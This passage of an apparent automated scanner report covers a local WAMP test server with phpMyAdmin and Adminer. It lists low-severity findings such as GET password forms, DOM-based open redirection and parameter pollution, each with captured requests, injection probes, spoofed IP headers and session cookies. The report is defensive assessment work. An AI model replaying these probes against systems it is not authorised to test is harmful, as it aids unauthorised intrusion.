All forms submitting passwords should use the POST method. To achieve this, applications should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

6.1. http://localhost/examplewebiste/vulnerabilities/brute/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/brute/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password field:

Request 1

GET /examplewebiste/vulnerabilities/brute/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:42 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4323
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
</h2>

       <form action="#" method="GET">
           Username:<br />
...[SNIP]...
<br />
           <input type="password" AUTOCOMPLETE="off" name="password"><br />
...[SNIP]...
6.2. http://localhost/examplewebiste/vulnerabilities/csrf/

Summary

Severity:   Low
Confidence:   Certain
Host:   http://localhost
Path:   /examplewebiste/vulnerabilities/csrf/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:

The form contains the following password fields:

Request 1

GET /examplewebiste/vulnerabilities/csrf/ HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko/20100101 Firefox/62.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru,az-AZ;q=0.8,az;q=0.6,en-US;q=0.4,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://localhost/examplewebiste/vulnerabilities/upload/
Cookie: security=low; PHPSESSID=ijpljt3jfnhra9b1smq3cka20p
Connection: close
Upgrade-Insecure-Requests: 1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 20:22:36 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4269
Connection: close
Content-Type: text/html;charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

   <head>
       <meta http-equiv="Content-T
...[SNIP]...
<br />

       <form action="#" method="GET">
           New password:<br />
           <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
...[SNIP]...
<br />
           <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
...[SNIP]...
7. Open redirection (DOM-based)

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://localhost
Path:   /phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js

Issue detail

The application may be vulnerable to DOM-based open redirection. Data is read from location.href and passed to location.href.

Issue background

DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.

DOM-based open redirection arises when a script writes controllable data into the target of a redirection in an unsafe way. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will cause a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Note: If an attacker is able to control the start of the string that is passed to the redirection API, then it may be possible to escalate this vulnerability into a JavaScript injection attack, by using a URL with the javascript: pseudo-protocol to execute arbitrary script code when the URL is processed by the browser.

We automatically identify this issue using static code analysis, which may lead to false positives that are not actually exploitable. The relevant code and execution paths should be reviewed to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.

Issue remediation

The most effective way to avoid DOM-based open redirection vulnerabilities is not to dynamically set redirection targets using data that originated from any untrusted source. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing an arbitrary URL as a redirection target. In general, this is best achieved by using a whitelist of URLs that are permitted redirection targets, and strictly validating the target against this list before performing the redirection.

Vulnerability classifications

Request 1

GET /phpmyadmin/js/vendor/jquery/jquery.ba-hashchange-1.3.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:51 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:50 GMT
ETag: "408a-574048eead880"
Accept-Ranges: bytes
Content-Length: 16522
Connection: close
Content-Type: application/javascript

/*!
* jQuery hashchange event - v1.3 - 7/21/2010
* http://benalman.com/projects/jquery-hashchange-plugin/
*
* Copyright (c) 2010 "Cowboy" Ben Alman
* Dual licensed under the MIT and GPL licenses
...[SNIP]...
( hash !== last_hash ) {
history_set( last_hash = hash, history_hash );

$(window).trigger( str_hashchange );

} else if ( history_hash !== last_hash ) {
location.href = location.href.replace( /#.*/, '' ) + history_hash;
}

timeout_id = setTimeout( poll, $.fn[ str_hashchange ].delay );
};

// vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv
// vvvvvvvvvvvvvvvvv
...[SNIP]...

Static analysis

Data is read from location.href and passed to location.href via the following statement:
8. Open redirection (reflected DOM-based)

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://localhost
Path:   /phpmyadmin/url.php

Issue detail

The application may be vulnerable to reflected DOM-based open redirection.

The value of the url request parameter is copied into a JavaScript string literal. The payload qhqxt/igdtb was submitted in the url parameter.

The string containing the payload is then passed to window.location.

Issue background

Reflected DOM-based vulnerabilities arise when data is copied from a request and echoed into the application's immediate response within a part of the DOM that is then processed in an unsafe way by a client-side script. An attacker can leverage the reflection to control a part of the response (for example, a JavaScript string) that can be used to trigger the DOM-based vulnerability.

DOM-based open redirection arises when a script writes controllable data into the target of a redirection in an unsafe way. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will cause a redirection to an arbitrary external domain. This behavior can be leveraged to facilitate phishing attacks against users of the application. The ability to use an authentic application URL, targeting the correct domain and with a valid SSL certificate (if SSL is used), lends credibility to the phishing attack because many users, even if they verify these features, will not notice the subsequent redirection to a different domain.

Note: If an attacker is able to control the start of the string that is passed to the redirection API, then it may be possible to escalate this vulnerability into a JavaScript injection attack, by using a URL with the javascript: pseudo-protocol to execute arbitrary script code when the URL is processed by the browser.

We automatically identify this issue using static code analysis, which may lead to false positives that are not actually exploitable. The relevant code and execution paths should be reviewed to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.

Issue remediation

The most effective way to avoid DOM-based open redirection vulnerabilities is not to dynamically set redirection targets using data that originated from any untrusted source. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing an arbitrary URL as a redirection target. In general, this is best achieved by using a whitelist of URLs that are permitted redirection targets, and strictly validating the target against this list before performing the redirection.

Vulnerability classifications

Request 1

GET /phpmyadmin/url.php?url=https%3a%2f%2fwww.phpmyadmin.net%2fqhqxt%2figdtb HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/phpmyadmin/
Cookie: pma_lang=en; phpMyAdmin=gjpt8vdn3qa2itqo688fpnre2b

Response 1

HTTP/1.1 200 OK
Date: Fri, 19 Oct 2018 17:05:33 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=kfek0npqpim2ql4ghle5pr39sj; path=/phpmyadmin/; HttpOnly
Expires: Fri, 19 Oct 2018 17:05:33 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Fri, 19 Oct 2018 17:05:33 +0000
Set-Cookie: phpMyAdmin=kfek0npqpim2ql4ghle5pr39sj; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 205
Connection: close
Content-Type: text/html; charset=utf-8

<script type='text/javascript'>
window.onload=function(){
window.location='https://www.phpmyadmin.net/qhqxt/igdtb';
}
</script>Taking you to the target
...[SNIP]...

Static analysis

Data is read from https://www.phpmyadmin.net/qhqxt/igdtb and passed to window.location via the following statement:
9. Password field with autocomplete enabled

Summary

Severity:   Low
Confidence:   Certain
Host:   http://localhost
Path:   /

Issue detail

The page contains a form with the following action URL:

The form contains the following password field with autocomplete enabled:

This issue was found in multiple locations under the reported path.

Issue background

Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications that employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.

The stored credentials can be captured by an attacker who gains control over the user's computer. Further, an attacker who finds a separate application vulnerability such as cross-site scripting may be able to exploit this to retrieve a user's browser-stored credentials.

Issue remediation

To prevent browsers from storing credentials entered into HTML forms, include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).

Please note that modern web browsers may ignore this directive. In spite of this there is a chance that not disabling autocomplete may cause problems obtaining PCI compliance.

Vulnerability classifications

Request 1

GET /adminer/adminer-4.6.3.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/adminer/adminer-4.6.3.php
Cookie: adminer_sid=ro1a53gkpq4e22pe1hks8bg294; adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; adminer_lang=en

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:39 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: adminer_lang=en; expires=Sat, 17 Nov 2018 21:01:41 GMT; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Set-Cookie: adminer_key=8a3d73781b5d465e1c9cbd2e1546e31f; path=/adminer/adminer-4.6.3.php; HttpOnly; SameSite=lax
Cache-Control: no-cache
X-Frame-Options: deny
X-XSS-Protection: 0
X-Content-Type-Options: nosniff
Referrer-Policy: origin-when-cross-origin
Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-NjM2M2NlMjQ3Y2E0Mzc2Nzg0OTc5ZjI5MTc3NmRkMTM=' 'strict-dynamic'; connect-src 'self'; frame-src https://www.adminer.org; object-src 'none'; base-uri 'none'; form-action 'self'
Content-Length: 4324
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html>
<html lang="en" dir="ltr">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="robots" content="noindex">
<title>Login - Adminer</title>
<link rel="styleshe
...[SNIP]...
</div>
<form action='' method='post'>
<div>
...[SNIP]...
<td><input type="password" name="auth[password]">
<tr>
...[SNIP]...

Request 2

GET /phpmyadmin/ HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:44 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=d98ucla1mm99d9j47t7dpjp30s; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=d98ucla1mm99d9j47t7dpjp30s; path=/phpmyadmin/; HttpOnly
Set-Cookie: pma_lang=en; expires=Sat, 17-Nov-2018 21:01:53 GMT; Max-Age=2592000; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=fkfnc9n6fi8pt5dg5pbk62ulir; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14490
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
<!-- Login form -->
<form method="post" id="login_form" action="index.php" name="login_form" class="disableAjax login hide js-show">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield" />
</div>
...[SNIP]...

Request 3

GET /phpmyadmin/index.php HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 3

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:47 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Set-Cookie: phpMyAdmin=mtg310gqac7ps1060n42svigii; path=/phpmyadmin/; HttpOnly
Expires: Thu, 18 Oct 2018 21:01:59 +0000
Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0
Last-Modified: Thu, 18 Oct 2018 21:01:59 +0000
Set-Cookie: phpMyAdmin=mtg310gqac7ps1060n42svigii; path=/phpmyadmin/; HttpOnly
Set-Cookie: pma_lang=en; expires=Sat, 17-Nov-2018 21:01:53 GMT; Max-Age=2592000; path=/phpmyadmin/; HttpOnly
Set-Cookie: phpMyAdmin=oaovt97e8rv9r4i0uskgc22imq; path=/phpmyadmin/; HttpOnly
X-ob_mode: 1
X-Frame-Options: DENY
Referrer-Policy: no-referrer
Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none';
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: noindex, nofollow
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 14508
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML><html lang='en' dir='ltr'><head><meta charset="utf-8" /><meta name="referrer" content="no-referrer" /><meta name="robots" content="noindex,nofollow" /><meta http-equiv="X-UA-Compatible"
...[SNIP]...
<!-- Login form -->
<form method="post" id="login_form" action="index.php" name="login_form" class="disableAjax login hide js-show">
<fieldset>
...[SNIP]...
</label>
<input type="password" name="pma_password" id="input_password" value="" size="24" class="textfield" />
</div>
...[SNIP]...
10. Link manipulation (DOM-based)

There are 2 instances of this issue:

Issue background

DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.

DOM-based link manipulation arises when a script writes controllable data to a navigation target within the current page, such as a clickable link or the submission URL of a form. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will modify the target of links within the response. An attacker may be able to leverage this to perform various attacks, including:

We automatically identify this issue using static code analysis, which may lead to false positives that are not actually exploitable. The relevant code and execution paths should be reviewed to determine whether this vulnerability is indeed present, or whether mitigations are in place that would prevent exploitation.

Issue remediation

The most effective way to avoid DOM-based link manipulation vulnerabilities is not to dynamically set the target URLs of links or forms using data that originated from any untrusted source. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing an arbitrary URL as a link target. In general, this is best achieved by using a whitelist of URLs that are permitted link targets, and strictly validating the target against this list before setting the link target.

Vulnerability classifications



10.1. http://localhost/phpmyadmin/doc/html/search.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The application may be vulnerable to DOM-based link manipulation. Data is read from location.href and passed to the 'href' property of a DOM element.

Request 1

GET /phpmyadmin/doc/html/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "e4e-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 3662
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
...[SNIP]...

Request 2

GET /phpmyadmin/doc/html/_static/jquery.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 20:31:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "413ac-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 267180
Connection: close
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v3.1.1
* https://jquery.com/
*
* Includes Sizzle.js
* https://sizzlejs.com/
*
* Copyright jQuery Foundation and other contributors
* Released under the MIT lice
...[SNIP]...
t-prolog char sequence (#10098); must appease lint and evade compression
   allTypes = "*/".concat( "*" ),

   // Anchor tag for parsing the document origin
   originAnchor = document.createElement( "a" );
   originAnchor.href = location.href;

// Base "constructor" for jQuery.ajaxPrefilter and jQuery.ajaxTransport
function addToPrefiltersOrTransports( structure ) {

   // dataTypeExpression is optional and defaults to "*"
   return function( d
...[SNIP]...

Static analysis

Data is read from location.href and passed to the 'href' property of a DOM element via the following statement:
10.2. http://localhost/phpmyadmin/doc/html/search.html

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /phpmyadmin/doc/html/search.html

Issue detail

The application may be vulnerable to DOM-based link manipulation. Data is read from document.location.href and passed to the 'href' property of a DOM element.

Request 1

GET /phpmyadmin/doc/html/search.html HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:46 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "e4e-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 3662
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=
...[SNIP]...
</script>
<script type="text/javascript" src="_static/jquery.js"></script>
...[SNIP]...

Request 2

GET /phpmyadmin/doc/html/_static/jquery.js HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 2

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 20:31:24 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "413ac-574048ecc5400"
Accept-Ranges: bytes
Content-Length: 267180
Connection: close
Content-Type: application/javascript

/*!
* jQuery JavaScript Library v3.1.1
* https://jquery.com/
*
* Includes Sizzle.js
* https://sizzlejs.com/
*
* Copyright jQuery Foundation and other contributors
* Released under the MIT lice
...[SNIP]...
MLDocument( "" );

           // Set the base href for the created document
           // so any parsed elements with URLs
           // are based on the document's URL (gh-2965)
           base = context.createElement( "base" );
           base.href = document.location.href;
           context.head.appendChild( base );
       } else {
           context = document;
       }
   }

   parsed = rsingleTag.exec( data );
   scripts = !keepScripts && [];

   // Single tag
   if ( parsed ) {
       return [ context.cre
...[SNIP]...

Static analysis

Data is read from document.location.href and passed to the 'href' property of a DOM element via the following statement:
11. Client-side HTTP parameter pollution (reflected)

There are 2 instances of this issue:

Issue background

Client-side HTTP parameter pollution (HPP) vulnerabilities arise when an application embeds user input in URLs in an unsafe manner. An attacker can use this vulnerability to construct a URL that, if visited by another application user, will modify URLs within the response by inserting additional query string parameters and sometimes overriding existing ones. This may result in links and forms having unexpected side effects. For example, it may be possible to modify an invitation form using HPP so that the invitation is delivered to an unexpected recipient.

The security impact of this issue depends largely on the nature of the application functionality. Even if it has no direct impact on its own, an attacker may use it in conjunction with other vulnerabilities to escalate their overall severity.

Issue remediation

Ensure that user input is URL-encoded before it is embedded in a URL.

References

Vulnerability classifications



11.1. http://localhost/ [lang parameter]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /

Issue detail

The value of the lang request parameter is copied into the response within the query string of a URL.

The payload eqz&asn=1 was submitted in the lang parameter. This input was echoed unmodified within the "href" attribute of an "a" tag.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary query string parameters into URLs in the application's response.

Request 1

GET /?lang=eqz%26asn%3d1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:02:52 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Content-Length: 5580
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html>
<head>
   <title>WAMPSERVER Homepage</title>
   <meta charset="UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
<meta name="viewport" content="width=de
...[SNIP]...
<a href='add_vhost.php?lang=eqz&asn=1'>
...[SNIP]...
11.2. http://localhost/add_vhost.php [lang parameter]

Summary

Severity:   Low
Confidence:   Firm
Host:   http://localhost
Path:   /add_vhost.php

Issue detail

The value of the lang request parameter is copied into the response within the query string of a URL.

The payload qpm&lrd=1 was submitted in the lang parameter. This input was echoed unmodified within the "href" attribute of an "a" tag.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary query string parameters into URLs in the application's response.

Request 1

GET /add_vhost.php?lang=qpm%26lrd%3d1 HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost/add_vhost.php?lang=english
Cookie: PHPSESSID=tufmlll3341349udhaahv635hv

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:03:08 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
X-Powered-By: PHP/7.2.10
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 4965
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<html lang="fr">
   <head>
       <title>Ajouter un "Virtual Host"</title>
       <meta charset="UTF-8">
       <style>
           * {
               margin: 0;
               padding: 0;
           }

           html {
               background:
...[SNIP]...
<a href="add_vhost.php?lang=qpm&lrd=1">
...[SNIP]...
12. Source code disclosure

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://localhost
Path:   /

Issue detail

The application appears to disclose some server-side source code written in PHP. This issue was found in multiple locations under the reported path.

Issue background

Source code intended to be kept server-side can sometimes end up being disclosed to users. Such code may contain sensitive information such as database passwords and secret keys, which may help malicious users formulate attacks against the application.

Issue remediation

Server-side source code is normally disclosed to clients as a result of typographical errors in scripts or because of misconfiguration, such as failing to grant executable permissions to a script or directory. Review the cause of the code disclosure and prevent it from happening.

Vulnerability classifications

Request 1

GET /phpmyadmin/doc/html/_sources/config HTTP/1.1
Host: localhost
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
X-Originating-IP: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Client-IP: 127.0.0.1

Response 1

HTTP/1.1 200 OK
Date: Thu, 18 Oct 2018 21:01:45 GMT
Server: Apache/2.4.35 (Win64) PHP/7.2.10
Content-Location: config.txt
Vary: negotiate
TCN: choice
Last-Modified: Wed, 22 Aug 2018 11:36:48 GMT
ETag: "1bdd6-574048ecc5400;578846343188a"
Accept-Ranges: bytes
Content-Length: 114134
Connection: close
Content-Type: text/plain

.. index:: config.inc.php

.. _config:

Configuration
=============

All configurable data is placed in :file:`config.inc.php` in phpMyAdmin's
toplevel directory. If this file does not exist, please
...[SNIP]...
xample-signon:

Example for signon authentication
+++++++++++++++++++++++++++++++++

This example uses :file:`examples/signon.php` to demonstrate usage of :ref:`auth_signon`:

.. code-block:: php

<?php
$i = 0;
$i++;
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'signon';
$cfg['Servers'][$i]['SignonSession'] = 'SignonSession';
